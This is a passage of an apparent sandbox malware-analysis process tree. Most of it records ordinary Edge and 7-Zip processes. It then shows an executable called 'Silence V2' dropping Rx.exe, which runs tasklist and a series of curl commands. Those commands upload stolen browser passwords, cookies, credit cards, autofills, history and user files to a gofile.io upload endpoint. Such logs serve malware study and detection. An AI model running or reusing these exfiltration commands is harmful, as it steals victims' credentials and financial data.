--content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=096601E93B8EF5DEEB50F6EC533C2119 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:2268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:1428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd330746f8,0x7ffd33074708,0x7ffd33074718
  2⤵
  PID:1520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
  2⤵
  PID:2724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
  2⤵
  PID:1284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:3132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
  2⤵
  PID:2884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
  2⤵
  PID:2604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
  2⤵
  PID:976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3728 /prefetch:8
  2⤵
  PID:1644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1
  2⤵
  PID:3028
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
  2⤵
  PID:4676
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4348 /prefetch:1
  2⤵
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
  2⤵
  PID:4900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
  2⤵
  PID:2084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
  2⤵
  PID:396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
  2⤵
  PID:1672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
  2⤵
  PID:2856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
  2⤵
  PID:4108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:3272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3880 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
  2⤵
  PID:1672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10509650012568286898,6922168891155745199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:180

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3816

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1640

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Silence V2\" -spe -an -ai#7zMap15584:82:7zEvent9321
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
PID:3104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd330746f8,0x7ffd33074708,0x7ffd33074718
  2⤵
  PID:1456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
  2⤵
  PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
  2⤵
  PID:1644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:1332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:3540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4468 /prefetch:1
  2⤵
  PID:3992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
  2⤵
  PID:460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
  2⤵
  PID:4516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:5012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
  2⤵
  PID:4900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
  2⤵
  PID:2252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:2888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5772 /prefetch:8
  2⤵
  PID:3100
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
  2⤵
  PID:4540
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
  2⤵
  PID:4020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
  2⤵
  PID:404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
  2⤵
  PID:1104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,365823949681973178,16663265812344894221,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
  2⤵
  PID:3884

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3140

C:\Users\Admin\Downloads\Silence V2\Silence V2.exe
"C:\Users\Admin\Downloads\Silence V2\Silence V2.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4556
- C:\Users\Admin\AppData\Local\Temp\Rx.exe
  "C:\Users\Admin\AppData\Local\Temp\Rx.exe"
  2⤵
  - Executes dropped EXE
  PID:4636
- - C:\Users\Admin\AppData\Local\Temp\Rx.exe
    "C:\Users\Admin\AppData\Local\Temp\Rx.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:1628
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:2724
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:3476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:608
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:3980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:4892
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:4316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:4420
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:1376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:2604
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:5092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:2620
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:2524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupClear.htm" https://store4.gofile.io/uploadFile"
      4⤵
      PID:4876
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Downloads/BackupClear.htm" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:4276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMount.vstm" https://store4.gofile.io/uploadFile"
      4⤵
      PID:1252
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Downloads/RenameMount.vstm" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:4472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/SkipBackup.midi" https://store4.gofile.io/uploadFile"
      4⤵
      PID:2760
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Downloads/SkipBackup.midi" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:1924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/UseBackup.shtml" https://store4.gofile.io/uploadFile"
      4⤵
      PID:3964
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Downloads/UseBackup.shtml" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:1144
- C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
  "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3324
- - C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
    "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
      "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:4408
    - - C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3948
      - C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\Silence V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"
        7⤵
